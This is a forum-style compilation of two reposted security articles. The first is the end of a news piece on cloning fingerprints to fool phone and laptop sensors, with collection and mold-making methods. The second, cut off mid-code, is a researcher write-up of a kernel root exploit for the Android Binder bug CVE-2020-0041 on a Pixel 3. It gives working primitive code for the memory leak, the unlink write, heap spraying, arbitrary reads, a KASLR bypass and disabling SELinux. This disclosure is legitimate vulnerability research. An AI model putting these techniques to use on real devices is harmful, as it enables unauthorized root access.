The devices that were the most susceptible to fake fingerprints were the AICase padlock and Huawei’s Honor 7x and Samsung’s Note 9 Android phones, all of which were bypassed 100 percent of the time. Fingerprint authentication in the iPhone 8, MacBook Pro 2018, and the Samsung S10 came next, where the success rate was more than 90 percent. Five laptop models running Windows 10 and two USB drives—the Verbatim Fingerprint Secure and the Lexar Jumpdrive F35—performed the best, with researchers achieving a 0-percent success rate. The chart below summarizes the results:
The orange lines are the percent of success with the direct collection method, the blue lines with the image sensor method and the yellow line with the picture method.
The reason for the better results from the Windows 10 machines, the researchers said, is that the comparison algorithm for all of them resided in the OS, and therefore the result was shared among all platforms. The researchers cautioned against concluding that the zero success-rate for Windows 10 devices and the USB drives meant they were safer. “We estimate that with a larger budget, more resources and a team dedicated to this task, it is possible to bypass these systems, too,” they wrote.
One other product tested—a Samsung A70—also attained a 0-percent success rate, but researchers attributed this to the difficulty getting authentication to work even when it received input from real fingerprints that had been enrolled.
Defeating fingerprint authentication: A how-to
There are two steps to fingerprint authentication: capturing, in which a sensor generates an image of the fingerprint, and analysis that compares the inputted fingerprint to the fingerprint that’s enrolled. Some devices use firmware that runs on the sensor to perform the comparison while others rely on the operating system. Windows Hello included in Windows 10, for example, performs the comparison from the OS using Microsoft’s Biometric Devices Design Guide.
There are three types of sensors. Capacitive sensors use a finger’s natural electrical conductivity to read prints, as ridges touch the reader while valleys do not. Optical sensors read the image of a fingerprint by using a light source that illuminates ridges in contact with the reader and reads them through a prism. Ultrasonic sensors emit an ultrasonic pulse that generates an echo that’s read by the sensor, with ridges and valleys registering different signatures.
The researchers devised three techniques for collecting the fingerprint of a target. The first is direct collection, which involves a target pressing a finger on a brand of clay known as Plastiline. With that, the attacker obtains a negative of the fingerprint.
The second technique is to have the target press a finger onto a fingerprint reader, such as the kind that’s used at airports, banks, and border crossings. The reader would then capture a bitmap image of the print. The third is to capture a print on a drinking glass or other transparent surface and take a photograph of it.
After the print is collected using the print reader or photo methods, certain optimizations are often required. For prints recorded on a fingerprint reader, for instance, multiple images had to be merged together to create a single image that was large enough to pass for a real fingerprint. Below is an example of the process, performed on fingerprints the FBI obtained from prohibition-era gangster Al Capone.
Prints captured on a glass and then photographed, meanwhile, had to be touched up with filters to increase the contrast. Then the researchers used digital sculpting tools such as ZBrush to create a 3D model based on the 2D picture.
The 2-D image is on the left; the 3-D model is on the right.
Once the fingerprint was collected from either a scanner or glass and then optimized, the researchers replicated them onto a mold, which was made from either fabric glue or silicon. When working against capacitive sensors, materials also had to include graphite and aluminum powder to increase conductivity.
To be successfully passed off as a real finger, the mold had to be a precise size. A variance of just 1 percent too big or too small would cause the attack to fail. This demand complicated the process, since the molds had to be cured to create rigidity and remove toxins. The curing often caused the molds to shrink. Casting the print onto a mold was done with either a 25-micron or 50-micron resolution 3D printer. The former was more accurate but required an hour to print a single mold. The latter took half as long but wasn’t as precise.
Once researchers created a mold, they pressed it against the sensor to see if it treated the fake print as the real one enrolled to unlock the phone, laptop, or lock. The chart above showing the results tracks how various collection methods worked against specific devices. In seven cases, direct collection worked the best, and in only one case did a different method—a fingerprint reader—perform better.
Making it work in the real world
The higher success rate of direct collection doesn’t necessarily mean it’s the most effective collection method in real-world attacks, since it requires that the adversary trick or force a target to press a finger against a squishy piece of clay. By contrast, obtaining fingerprints from print readers or from photos of smudges on glass may be better since nation-state attackers may have an easier time recovering print images from an airport or customs checkpoint or surreptitiously obtaining a drinking glass after a target uses it.
Another possibility is breaching a database of fingerprint data, as hackers did in 2014 when they stole 5.6 million sets of fingerprints from the US Office of Personnel Management.
“The direct collection is always the better [option], because we directly have the mold (on the platiline),” Rascagneres, the Talos researcher, wrote in an email. “The size is perfect; we don’t need a 3D printer. This is the more efficient approach. The two other collection methods also work, but with lower success as expected.”
The researchers balanced the stringent demands of the attack with a relatively modest budget of just $2,000. “The point of the low budget was to ensure the scenario was as realistic as possible," Rascagneres told me. “We determined if we could do it for $2k then it was reasonably feasible.
What we found was that while we could keep the price point low, the process of making functional prints was actually very complex and time consuming.”
The takeaway, the researchers said, isn’t that fingerprint authentication is too weak to be trusted. For most people in most settings, it’s perfectly fine, and when risks increase temporarily—such as when police with a search warrant come knocking on a door—users can usually disable fingerprint authentication and fall back to password or PIN verification. At the same time, users should remember that fingerprint authentication is hardly infallible.
“Any fingerprint cloning technique is extremely difficult, making fingerprint authentication a valid method for 95 percent of the population,” Ventura, the other Talos researcher, wrote in an email. “People that have a low risk profile and don’t need to worry about nation-state level threat actors are fine. The remaining 5 percent could be exposed and may want to take other precautions.”
Sursa: https://arstechnica.com/information-technology/2020/04/attackers-can-bypass-fingerprint-authentication-with-an-80-success-rate/
  25. Exploiting the kernel with CVE-2020-0041 to achieve root privileges Posted on Apr 08, 2020 | Author: Eloi Sanfelix and Jordan Gruskovnjak A few months ago we discovered and exploited a bug in the Binder driver, which we reported to Google on December 10, 2019. The bug was included in the March 2020 Android Security Bulletin, with CVE-2020-0041. In the previous post we described the bug and how to use it to escape the Google Chrome sandbox. If you haven't read that post, please do so now in order to understand what bug we are exploiting and what primitives we have available. In this post we'll describe how to attack the kernel and obtain root privileges on a Pixel 3 device using the same bug. Reminder: memory corruption primitives As described in our previous post, we can corrupt parts of a validated binder transaction while it's being processed by the driver. There are two stages at which these values are used that we could target for our attack: When the transaction is received, it gets processed by the userspace components. This includes libbinder (or libhwbinder if using /dev/hwbinder) as well as upper layers. This is what we used to attack the Chrome browser process in the previous post. When userspace is done with the transaction buffer, it asks the driver to free it with the BC_FREE_BUFFER command. This results in the driver processing the transaction buffer. 
Let's analyze the transaction buffer cleanup code in the binder driver while considering that we could have corrupted the transaction data:

static void binder_transaction_buffer_release(struct binder_proc *proc,
                                              struct binder_buffer *buffer,
                                              binder_size_t failed_at,
                                              bool is_failure)
{
        int debug_id = buffer->debug_id;
        binder_size_t off_start_offset, buffer_offset, off_end_offset;

        binder_debug(BINDER_DEBUG_TRANSACTION,
                     "%d buffer release %d, size %zd-%zd, failed at %llx\n",
                     proc->pid, buffer->debug_id,
                     buffer->data_size, buffer->offsets_size,
                     (unsigned long long)failed_at);

        if (buffer->target_node)
[1]             binder_dec_node(buffer->target_node, 1, 0);

        off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
        off_end_offset = is_failure ? failed_at :
                                off_start_offset + buffer->offsets_size;
[2]     for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
             buffer_offset += sizeof(binder_size_t)) {
                struct binder_object_header *hdr;
                size_t object_size;
                struct binder_object object;
                binder_size_t object_offset;

                binder_alloc_copy_from_buffer(&proc->alloc, &object_offset,
                                              buffer, buffer_offset,
                                              sizeof(object_offset));
                object_size = binder_get_object(proc, buffer,
                                                object_offset, &object);
                if (object_size == 0) {
                        pr_err("transaction release %d bad object at offset %lld, size %zd\n",
                               debug_id, (u64)object_offset, buffer->data_size);
                        continue;
                }
                hdr = &object.hdr;
                switch (hdr->type) {
                case BINDER_TYPE_BINDER:
                case BINDER_TYPE_WEAK_BINDER: {
                        struct flat_binder_object *fp;
                        struct binder_node *node;

                        fp = to_flat_binder_object(hdr);
[3]                     node = binder_get_node(proc, fp->binder);
                        if (node == NULL) {
                                pr_err("transaction release %d bad node %016llx\n",
                                       debug_id, (u64)fp->binder);
                                break;
                        }
                        binder_debug(BINDER_DEBUG_TRANSACTION,
                                     "        node %d u%016llx\n",
                                     node->debug_id, (u64)node->ptr);
[4]                     binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER,
                                        0);
                        binder_put_node(node);
                } break;
                ...
                case BINDER_TYPE_FDA: {
                        ...
                        /*
                         * the source data for binder_buffer_object is visible
                         * to user-space and the @buffer element is the user
                         * pointer to the buffer_object containing the fd_array.
                         * Convert the address to an offset relative to
                         * the base of the transaction buffer.
                         */
[5]                     fda_offset = (parent->buffer - (uintptr_t)buffer->user_data) +
                                fda->parent_offset;
                        for (fd_index = 0; fd_index < fda->num_fds;
                             fd_index++) {
                                u32 fd;
                                binder_size_t offset = fda_offset +
                                        fd_index * sizeof(fd);

                                binder_alloc_copy_from_buffer(&proc->alloc,
                                                              &fd, buffer,
                                                              offset,
                                                              sizeof(fd));
[6]                             task_close_fd(proc, fd);
                        }
                } break;
                default:
                        pr_err("transaction release %d bad object type %x\n",
                               debug_id, hdr->type);
                        break;
                }
        }
}

At [1] the driver checks if there is a target binder node for the current transaction, and if it exists it decrements its reference count. This is interesting because it could trigger the release of such a node if its reference count reaches zero, but we do not have control of this pointer.

At [2] the driver iterates through all objects in the transaction, and goes into a switch statement where the required cleanup is performed for each object type. For types BINDER_TYPE_BINDER and BINDER_TYPE_WEAK_BINDER, the cleanup involves looking up an object using fp->binder at [3] and then decrementing the reference count at [4]. Since fp->binder is read from the transaction buffer, we can actually prematurely release node references by replacing this value with a different one. This can in turn lead to use-after-free of binder_node objects.

Finally, for BINDER_TYPE_FDA objects we could corrupt the parent->buffer field used at [5] and end up closing arbitrary file descriptors on a remote process.

In our exploit we targeted the reference counts of BINDER_TYPE_BINDER objects to cause a use-after-free on objects of type struct binder_node. This is exactly the same type of use-after-free we described in our OffensiveCon presentation about CVE-2019-2025. However some of the techniques we used in that exploit are not available to us in recent kernels anymore.
Aside: using binder to talk to yourself The binder driver is designed in such a way that transactions can only be sent to handles you have received from other processes or to the context manager (handle 0). In general, when one wants to talk to a service, they first request a handle to the context manager (servicemanager, hwservicemanager or vndservicemanager for the three Binder domains used in current versions of Android). If a service creates a sub-service or an object on behalf of the client, then the service will send a handle such that the client can talk to the new object. In some situations, it would be beneficial to control both ends of the communication, e.g. to have better timing control for race conditions. In our particular case, we require knowing the address of the receiving-side binder mapping while we are sending the transaction to avoid a crash. Additionally, in order to cause a use-after-free with the corruption primitive we have, the receiving process has to create binder nodes with the fp->binder field equal to the sg_buf value we are corrupting with (which belongs to the sender address space). The easiest way to meet all these constraints is to control both the sending and the receiving end of a transaction. In that case, we have access to all the required values and do not need to use an info-leak to retrieve them from a remote process. However, we are not allowed to register services through the context manager from unprivileged applications, so we cannot go the normal route. Instead, we used the ITokenManager service in the /dev/hwbinder domain to setup the communication channel. To our knowledge, this service was first publicly used by Gal Beniamini in this Project Zero report: Note that in order to pass the binder instance between process A and process B, the "Token Manager" service can be used. This service allows callers to insert binder objects and retrieve 20-byte opaque tokens representing them. 
Subsequently, callers can supply the same 20-byte token, and retrieve the previously inserted binder object from the service. The service is accessible even to (non-isolated) app contexts (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#188).

We use this very same mechanism in our exploit in order to have a handle to our own "process". Note however that "process" here does not really mean an actual process, but a binder_proc structure associated to a binder file descriptor. This means we can open two binder file descriptors, create a token through the first file descriptor and retrieve it from the second one. With this, we have received a handle owned by the first file descriptor, and can now send binder transactions between the two.

Leaking data with the binder_node use-after-free

Binder nodes are used by the driver in two different ways: as part of transaction contents in order to pass them from one process to another, or as targets of a transaction. When used as part of a transaction, these nodes are always retrieved from a rb-tree of nodes and properly reference counted. When we cause a use-after-free of a node, it also gets removed from the rb-tree. For this reason, we can only have dangling pointers to freed nodes when used as targets of a transaction, since in this case pointers to the actual binder_node are stored by the driver in transaction->target_node.

There are quite a few references to target_node in the binder driver, but many of them are performed in the sending path of a transaction or in debug code. From the others, the transaction receipt path provides us a way to leak some data back to userland:

struct binder_transaction_data *trd = &tr.transaction_data;
...
        if (t->buffer->target_node) {
                struct binder_node *target_node = t->buffer->target_node;
                struct binder_priority node_prio;

[1]             trd->target.ptr = target_node->ptr;
                trd->cookie = target_node->cookie;
                node_prio.sched_policy = target_node->sched_policy;
                node_prio.prio = target_node->min_priority;
                binder_transaction_priority(current, t, node_prio,
                                            target_node->inherit_rt);
                cmd = BR_TRANSACTION;
        } else {
                trd->target.ptr = 0;
                trd->cookie = 0;
                cmd = BR_REPLY;
        }
...
[2]     if (copy_to_user(ptr, &tr, trsize)) {
                if (t_from)
                        binder_thread_dec_tmpref(t_from);
                binder_cleanup_transaction(t, "copy_to_user failed",
                                           BR_FAILED_REPLY);
                return -EFAULT;
        }
        ptr += trsize;

At [1] the driver extracts two 64-bit values from the target_node into the transaction_data structure. This structure is later copied to userland at [2]. Therefore, if we receive a transaction after we have freed its target_node and replaced it by another object, we can read out two 64-bit fields at the offsets corresponding to ptr and cookie. If we look at this structure on gdb for a build of a recent pixel 3 kernel, we can see these fields at offsets 0x58 and 0x60 respectively:

(gdb) pt /o struct binder_node
/* offset    |  size */  type = struct binder_node {
/*    0      |     4 */    int debug_id;
/*    4      |     4 */    spinlock_t lock;
/*    8      |    24 */    struct binder_work {
/*    8      |    16 */        struct list_head {
/*    8      |     8 */            struct list_head *next;
/*   16      |     8 */            struct list_head *prev;
                               /* total size (bytes):  16 */
                           } entry;
/*   24      |     4 */        enum {BINDER_WORK_TRANSACTION = 1,
                                     BINDER_WORK_TRANSACTION_COMPLETE,
                                     BINDER_WORK_RETURN_ERROR,
                                     BINDER_WORK_NODE,
                                     BINDER_WORK_DEAD_BINDER,
                                     BINDER_WORK_DEAD_BINDER_AND_CLEAR,
                                     BINDER_WORK_CLEAR_DEATH_NOTIFICATION} type;
                           /* total size (bytes):  24 */
                       } work;
/*   32      |    24 */    union {
/*                24 */        struct rb_node {
/*   32      |     8 */            unsigned long __rb_parent_color;
/*   40      |     8 */            struct rb_node *rb_right;
/*   48      |     8 */            struct rb_node *rb_left;
                               /* total size (bytes):  24 */
                           } rb_node;
/*                16 */        struct hlist_node {
/*   32      |     8 */            struct hlist_node *next;
/*   40      |     8 */            struct hlist_node **pprev;
                               /* total size (bytes):  16 */
                           } dead_node;
                           /* total size (bytes):  24 */
                       };
/*   56      |     8 */    struct binder_proc *proc;
/*   64      |     8 */    struct hlist_head {
/*   64      |     8 */        struct hlist_node *first;
                           /* total size (bytes):   8 */
                       } refs;
/*   72      |     4 */    int internal_strong_refs;
/*   76      |     4 */    int local_weak_refs;
/*   80      |     4 */    int local_strong_refs;
/*   84      |     4 */    int tmp_refs;
/*   88      |     8 */    binder_uintptr_t ptr;
/*   96      |     8 */    binder_uintptr_t cookie;
/*  104      |     1 */    struct {
/* 104: 7    |     1 */        u8 has_strong_ref : 1;
/* 104: 6    |     1 */        u8 pending_strong_ref : 1;
/* 104: 5    |     1 */        u8 has_weak_ref : 1;
/* 104: 4    |     1 */        u8 pending_weak_ref : 1;
                           /* total size (bytes):   1 */
                       };
/*  105      |     2 */    struct {
/* 105: 6    |     1 */        u8 sched_policy : 2;
/* 105: 5    |     1 */        u8 inherit_rt : 1;
/* 105: 4    |     1 */        u8 accept_fds : 1;
/* 105: 3    |     1 */        u8 txn_security_ctx : 1;
                           /* XXX 3-bit hole */
/*  106      |     1 */        u8 min_priority;
                           /* total size (bytes):   2 */
                       };
/*  107      |     1 */    bool has_async_transaction;
                           /* XXX 4-byte hole */
/*  112      |    16 */    struct list_head {
/*  112      |     8 */        struct list_head *next;
/*  120      |     8 */        struct list_head *prev;
                           /* total size (bytes):  16 */
                       } async_todo;

                           /* total size (bytes): 128 */
                         }

Therefore, we need to find objects that we can allocate and free at will, and that contain interesting data at these offsets. When we originally reported this bug to Google we produced a minimal exploit that overwrote selinux_enforcing, and we used a kgsl_drawobj_sync which would leak a pointer to itself and a pointer to a kernel function. This was enough for that minimal proof of concept, but not for a full root exploit as we are describing here.
For the full exploit, we used the same object as in our CVE-2019-2025 exploit: the epitem structure used to track watched files within eventpoll:

(gdb) pt /o struct epitem
/* offset    |  size */  type = struct epitem {
/*    0      |    24 */    union {
/*                24 */        struct rb_node {
/*    0      |     8 */            unsigned long __rb_parent_color;
/*    8      |     8 */            struct rb_node *rb_right;
/*   16      |     8 */            struct rb_node *rb_left;
                               /* total size (bytes):  24 */
                           } rbn;
/*                16 */        struct callback_head {
/*    0      |     8 */            struct callback_head *next;
/*    8      |     8 */            void (*func)(struct callback_head *);
                               /* total size (bytes):  16 */
                           } rcu;
                           /* total size (bytes):  24 */
                       };
/*   24      |    16 */    struct list_head {
/*   24      |     8 */        struct list_head *next;
/*   32      |     8 */        struct list_head *prev;
                           /* total size (bytes):  16 */
                       } rdllink;
/*   40      |     8 */    struct epitem *next;
/*   48      |    12 */    struct epoll_filefd {
/*   48      |     8 */        struct file *file;
/*   56      |     4 */        int fd;
                           /* total size (bytes):  12 */
                       } ffd;
/*   60      |     4 */    int nwait;
/*   64      |    16 */    struct list_head {
/*   64      |     8 */        struct list_head *next;
/*   72      |     8 */        struct list_head *prev;
                           /* total size (bytes):  16 */
                       } pwqlist;
/*   80      |     8 */    struct eventpoll *ep;
/*   88      |    16 */    struct list_head {
/*   88      |     8 */        struct list_head *next;
/*   96      |     8 */        struct list_head *prev;
                           /* total size (bytes):  16 */
                       } fllink;
/*  104      |     8 */    struct wakeup_source *ws;
/*  112      |    16 */    struct epoll_event {
/*  112      |     4 */        __u32 events;
                           /* XXX 4-byte hole */
/*  120      |     8 */        __u64 data;
                           /* total size (bytes):  16 */
                       } event;

                           /* total size (bytes): 128 */
                         }

As can be seen above, the fllink linked list overlaps with the leaked fields. This list is used by eventpoll to link all epitem structures that are watching the same struct file. Thus, we can leak a pair of kernel pointers.
There are several possibilities here, but let's consider what the data structures look like if we have only one such epitem structure for a particular struct file:

Therefore, should we leak the fllink contents for the epitem in the picture above, we would learn two identical pointers into the file structure. Now consider what happens if we have a second epitem on the same file:

In this case, if we leak from both epitems at the same time, we'd be learning their addresses as well as the address of the corresponding struct file. In our exploit we use both these tricks to disclose a struct file pointer and the address of the freed nodes before using them for the write primitive.

Note however that in order to leak data, we need to leave a pending transaction queued until we can trigger the bug and free the binder_node. The exploit does this by having dedicated threads for each pending transaction, and then decrementing the reference count as many times as required to free the node. After this happens, we can leak from the freed buffer at any time we like, as many times as we have created pending transactions.

Memory write primitive

In order to identify a memory write primitive, we turn to another use of the transaction->target_node field: the decrement of the reference count in binder_transaction_buffer_release discussed earlier. Assume we have replaced the freed node with a fully controlled object.
In this case, the driver decrements the reference count of the node with the following code:

static bool binder_dec_node_nilocked(struct binder_node *node,
                                     int strong, int internal)
{
        struct binder_proc *proc = node->proc;

        assert_spin_locked(&node->lock);
        if (proc)
                assert_spin_locked(&proc->inner_lock);
        if (strong) {
                if (internal)
                        node->internal_strong_refs--;
                else
                        node->local_strong_refs--;
                if (node->local_strong_refs || node->internal_strong_refs)
                        return false;
        } else {
                if (!internal)
                        node->local_weak_refs--;
                if (node->local_weak_refs || node->tmp_refs ||
                    !hlist_empty(&node->refs))
                        return false;
        }

        if (proc && (node->has_strong_ref || node->has_weak_ref)) {
                if (list_empty(&node->work.entry)) {
                        binder_enqueue_work_ilocked(&node->work, &proc->todo);
                        binder_wakeup_proc_ilocked(proc);
                }
[1]     } else {
                if (hlist_empty(&node->refs) && !node->local_strong_refs &&
                    !node->local_weak_refs && !node->tmp_refs) {
                        if (proc) {
                                binder_dequeue_work_ilocked(&node->work);
                                rb_erase(&node->rb_node, &proc->nodes);
                                binder_debug(BINDER_DEBUG_INTERNAL_REFS,
                                             "refless node %d deleted\n",
                                             node->debug_id);
                        } else {
[2]                             BUG_ON(!list_empty(&node->work.entry));
                                spin_lock(&binder_dead_nodes_lock);
                                /*
                                 * tmp_refs could have changed so
                                 * check it again
                                 */
                                if (node->tmp_refs) {
                                        spin_unlock(&binder_dead_nodes_lock);
                                        return false;
                                }
[3]                             hlist_del(&node->dead_node);
                                spin_unlock(&binder_dead_nodes_lock);
                                binder_debug(BINDER_DEBUG_INTERNAL_REFS,
                                             "dead node %d deleted\n",
                                             node->debug_id);
                        }
                        return true;
                }
        }
        return false;
}

We can set up the node data such that we reach the else branch at [1] and ensure that node->proc is NULL. In that case we first reach the list_empty check at [2]. To bypass this check we need to set up an empty list (i.e. next and prev point to the list_head itself), which is why we need to leak the node address first.
Once we've bypassed the check at [2], we can reach the hlist_del at [3] with controlled data. The function performs the following operations:

static inline void __hlist_del(struct hlist_node *n)
{
	struct hlist_node *next = n->next;
	struct hlist_node **pprev = n->pprev;

	WRITE_ONCE(*pprev, next);
	if (next)
		next->pprev = pprev;
}

static inline void hlist_del(struct hlist_node *n)
{
	__hlist_del(n);
	n->next = LIST_POISON1;
	n->pprev = LIST_POISON2;
}

This boils down to the classic unlink primitive, where we can set *X = Y and *(Y+8) = X. Therefore, given two writable kernel addresses, we can corrupt some of their data. Additionally, if we set next = NULL, we can perform a single 8-byte NULL write with just one kernel address.

Reallocating freed nodes with arbitrary contents

The steps described above for obtaining an unlink primitive leading to memory corruption assume we can replace the freed object with a controlled object. We do not need full control of the object, just enough to pass all the checks and trigger the hlist_del primitive without crashing. In order to achieve that, we used a well-known technique: spraying with control messages through the sendmsg syscall. The code for this system call looks as follows:

static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg,
			  struct msghdr *msg_sys, unsigned int flags,
			  struct used_address *used_address,
			  unsigned int allowed_msghdr_flags)
{
	struct compat_msghdr __user *msg_compat =
	    (struct compat_msghdr __user *)msg;
	struct sockaddr_storage address;
	struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
	unsigned char ctl[sizeof(struct cmsghdr) + 20]
	    __attribute__ ((aligned(sizeof(__kernel_size_t))));
	/* 20 is size of ipv6_pktinfo */
	unsigned char *ctl_buf = ctl;
	int ctl_len;
	ssize_t err;
	...
	if (ctl_len > sizeof(ctl)) {
[1]		ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
		if (ctl_buf == NULL)
			goto out_freeiov;
	}
	err = -EFAULT;
	/*
	 * Careful! Before this, msg_sys->msg_control contains a user pointer.
	 * Afterwards, it will be a kernel pointer. Thus the compiler-assisted
	 * checking falls down on this.
	 */
[2]	if (copy_from_user(ctl_buf,
			   (void __user __force *)msg_sys->msg_control,
			   ctl_len))
		goto out_freectl;
	msg_sys->msg_control = ctl_buf;
}
...
out_freectl:
	if (ctl_buf != ctl)
[3]		sock_kfree_s(sock->sk, ctl_buf, ctl_len);
out_freeiov:
	kfree(iov);
	return err;
}

At [1] a buffer is allocated on the kernel heap if the requested control message length is larger than the local ctl buffer. At [2] the control message is copied in from userland, and finally, after the message has been processed, the allocated buffer is freed at [3]. We use a blocking call so that the system call blocks once the destination socket buffer is full, keeping the thread parked between points [2] and [3]. In this way we control the lifetime of the replacement object. We could also use the approach Jann Horn took in his PROCA exploit: let the sendmsg call complete and immediately reallocate the object with e.g. a signalfd file descriptor. This would have the advantage of not needing a separate thread for each allocation, but otherwise the results should be fairly similar. In any case, using this type of spraying we can reallocate the freed binder_node with almost complete control, as required to trigger the write primitives described earlier. One thing to note though is that if our spray fails, we'll end up crashing the kernel because of the number of operations and checks performed on the freed memory. However, this use-after-free has the very nice property that, as long as we do not trigger the write primitive, we can simply close the binder file descriptor and the kernel won't notice any effects.
Thus, before we try to trigger a write primitive, we use the leak primitive to verify that we have successfully reallocated the node. We do this by keeping a large number of pending transactions around and reading one each time we need to leak data off the freed object. If the data is not what we expected, we simply close the binder file descriptor and try again. This property makes the exploit quite reliable even in the presence of relatively unreliable reallocations.

Obtaining an arbitrary read primitive

At this point, we use the same arbitrary read technique as described in the OffensiveCon 2020 talk. That is, we corrupt file->f_inode and use the following code to perform reads:

int do_vfs_ioctl(struct file *filp, unsigned int fd, unsigned int cmd,
		 unsigned long arg)
{
	int error = 0;
	int __user *argp = (int __user *)arg;
	struct inode *inode = file_inode(filp);

	switch (cmd) {
	...
	case FIGETBSZ:
		return put_user(inode->i_sb->s_blocksize, argp);
	...

If you looked at our slides: back in late 2018 we used a binder mapping spray to bypass PAN and have controlled data at a controlled location. However, the bug we are exploiting here was introduced while getting rid of the long-term kernel-side binder mappings. This means we cannot use binder mapping sprays anymore and must find another solution. The solution we came up with was pointing our f_inode field right into an epitem structure. This structure contains a completely controllable 64-bit field: the event.data field. We can modify this field using epoll_ctl(efd, EPOLL_CTL_MOD, fd, &event). Thus, if we line up the data field with the inode->i_sb field, we'll be able to perform an arbitrary read. The following picture shows the setup graphically: note how we have also corrupted the fllink.next field of the epitem, which now points back into the file->f_inode field due to our write primitive.
This could be a problem if this field is ever used, but because we are the only users of these struct file and epitem instances, we just need to avoid calling any API that makes use of them and we'll be fine. Based on the setup depicted above, we can now construct an arbitrary read primitive as follows:

uint64_t read32(uint64_t addr)
{
	struct epoll_event evt;
	evt.events = 0;
	evt.data.u64 = addr - 24;
	int err = epoll_ctl(file->ep_fd, EPOLL_CTL_MOD, pipes[0], &evt);

	uint32_t test = 0xdeadbeef;
	ioctl(pipes[0], FIGETBSZ, &test);
	return test;
}

uint64_t read64(uint64_t addr)
{
	uint32_t lo = read32(addr);
	uint32_t hi = read32(addr + 4);

	return (((uint64_t)hi) << 32) | lo;
}

Note that we set the data field of the epitem to addr - 24, where 24 is the offset of s_blocksize within the superblock structure. Also, even though s_blocksize is in principle 64 bits long, the ioctl code only copies 32 bits back to userland, so we need to read twice if we want to read 64-bit values. Now that we have an arbitrary read and know the address of a struct file from our initial leak, we can simply read its f_op field to retrieve a kernel .text pointer. This then leads to fully bypassing KASLR:

/* Step 1: leak a pipe file address */
file = node_new("leak_file");

/* Only works on files implementing the 'epoll' function. */
while (!node_realloc_epitem(file, pipes[0]))
	node_reset(file);

uint64_t file_addr = file->file_addr;
log_info("[+] pipe file: 0x%lx\n", file_addr);

/* Step 2: leak epitem address */
struct exp_node *epitem_node = node_new("epitem");
while (!node_kaddr_disclose(file, epitem_node))
	node_reset(epitem_node);

printf("[*] file epitem at %lx\n", file->kaddr);

/*
 * Alright, now we want to do a write8 to set file->f_inode.
 * Given the unlink primitive, we'll set file->f_inode = epitem + 80
 * and epitem + 88 = &file->f_inode.
 *
 * With this we can change f_inode->i_sb by modifying the epitem data,
 * and get an arbitrary read through ioctl.
 *
 * This is corrupting the fllink, so we better not touch anything there!
 */
struct exp_node *write8_inode = node_new("write8_inode");
node_write8(write8_inode, file->kaddr + 120 - 40, file_addr + 0x20);
printf("[*] Write done, should have arbitrary read now.\n");

uint64_t fop = read64(file_addr + 0x28);
printf("[+] file operations: %lx\n", fop);

kernel_base = fop - OFFSET_PIPE_FOP;
printf("[+] kernel base: %lx\n", kernel_base);

Disabling SELinux and setting up an arbitrary write primitive

Now that we know the kernel base address, we can use our write primitive to write a NULL qword over the selinux_enforcing variable, setting SELinux to permissive mode. Our exploit does this before setting up an arbitrary write primitive, because the technique we came up with actually requires disabling SELinux. After considering a few alternatives, we settled on attacking the sysctl tables the kernel uses to handle /proc/sys and all the data hanging from there. There are a number of global tables describing these variables, such as kern_table below:

static struct ctl_table kern_table[] = {
	{
		.procname	= "sched_child_runs_first",
		.data		= &sysctl_sched_child_runs_first,
		.maxlen		= sizeof(unsigned int),
		.mode		= 0644,
		.proc_handler	= proc_dointvec,
	},
#if defined(CONFIG_PREEMPT_TRACER) || defined(CONFIG_IRQSOFF_TRACER)
	{
		.procname	= "preemptoff_tracing_threshold_ns",
		.data		= &sysctl_preemptoff_tracing_threshold_ns,
		.maxlen		= sizeof(unsigned int),
		.mode		= 0644,
		.proc_handler	= proc_dointvec,
	},
	{
		.procname	= "irqsoff_tracing_threshold_ns",
		.data		= &sysctl_irqsoff_tracing_threshold_ns,
		.maxlen		= sizeof(unsigned int),
		.mode		= 0644,
		.proc_handler	= proc_dointvec,
	},
	...
For example, the first variable is called "sched_child_runs_first", which means it can be accessed through /proc/sys/kernel/sched_child_runs_first. The file mode is 0644, so it's writable by root only (SELinux restrictions may apply, of course), and it's an integer. Reading and writing are handled by the proc_dointvec function, which converts the integer to and from its string representation when the file is accessed. The data field points to where the variable lives in memory, which makes it an interesting target for obtaining an arbitrary read/write primitive. We initially tried to target some of these variables, but then realized that this table is only used during kernel initialization, so corrupting its contents is not very useful to us. However, the table is used to create a set of in-memory structures that define the existing sysctl variables and their permissions. These structures can be found by walking the sysctl_table_root structure, which contains an rb-tree of ctl_node nodes, which in turn point to the ctl_table tables defining the variables themselves. Since we have a read primitive, we can parse the tree and find its left-most node, which has no child nodes. Under normal circumstances this tree looks as shown in the picture below (only left-child connections are represented to keep the diagram somewhat readable): if you look at the alphabetic order of these nodes, you can see that following left children yields names in descending alphabetic order. In fact, this is the ordering rule in these trees: left children must sort lower than the current node, and right children higher. Thus, to keep the tree consistent, we add a left child to the left-most node with a name starting with "aaa" using our write8 primitive.
The following code finds the left-most node of the tree in prev_node, which will be the insertion point for our fake node:

/* Now we can prepare our magic sysctl node as a child of the left-most node */
uint64_t sysctl_table_root = kernel_base + SYSCTL_TABLE_ROOT_OFFSET;
printf("[+] sysctl_table_root = %lx\n", sysctl_table_root);
uint64_t ctl_dir = sysctl_table_root + 8;

uint64_t node = read64(ctl_dir + 80);
uint64_t prev_node;
while (node != 0) {
	prev_node = node;
	node = read64(node + 0x10);
}

In order to insert the new node, we need to find a location for it within kernel memory. This is required because modern phones ship with PAN (Privileged Access Never) enabled, which prevents the kernel from inadvertently dereferencing userland memory. Given that we have an arbitrary read primitive, we sort this out by parsing our process' page tables, starting at current->mm->pgd, and locating the address of one of our pages in the physmap. Using the physmap alias of our own userspace page is ideal because we can easily edit the nodes to change the address of the data we want to target, giving us a flexible read/write primitive. We resolve the physmap alias in the following way:

/* Now resolve our mapping at 2MB.
 * But first read memstart_addr so we can do phys_to_virt() */
memstart_addr = read64(kernel_base + MEMSTART_ADDR_OFFSET);
printf("[+] memstart_addr: 0x%lx\n", memstart_addr);

uint64_t mm = read64(current + MM_OFFSET);
uint64_t pgd = read64(mm + 0x40);

uint64_t entry = read64(pgd);
uint64_t next_tbl = phys_to_virt(((entry & 0xffffffffffff) >> 12) << 12);
printf("[+] First level entry: %lx -> next table at %lx\n", entry, next_tbl);

/* Offset 8 for 2MB boundary */
entry = read64(next_tbl + 8);
next_tbl = phys_to_virt(((entry & 0xffffffffffff) >> 12) << 12);
